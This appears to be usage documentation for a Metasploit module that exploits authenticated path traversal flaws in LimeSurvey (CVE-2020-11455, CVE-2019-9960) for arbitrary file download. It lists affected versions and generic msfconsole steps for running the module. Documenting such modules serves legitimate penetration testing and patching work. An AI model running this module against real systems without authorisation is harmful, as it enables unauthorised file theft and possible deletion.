This module exploits an authenticated path traversal vulnerability found in LimeSurvey
versions between 4.0 and 4.1.11 with CVE-2020-11455 or <= 3.15.9 with CVE-2019-9960,
inclusive.
In CVE-2020-11455 the getZipFile function within the filemanager functionality
allows for arbitrary file download. The file retrieved may be deleted after viewing,
which was confirmed in testing.
In CVE-2019-9960 the szip function within the downloadZip functionality allows
for arbitrary file download.
Verified against 4.1.11-200316, 3.15.0-181008, 3.9.0-180604, 3.6.0-180328,
3.0.0-171222, and 2.70.0-170921.
msf > use auxiliary/scanner/http/limesurvey_zip_traversals
msf auxiliary(limesurvey_zip_traversals) > show actions
...actions...
msf auxiliary(limesurvey_zip_traversals) > set ACTION < action-name >
msf auxiliary(limesurvey_zip_traversals) > show options
...show and set options...
msf auxiliary(limesurvey_zip_traversals) > run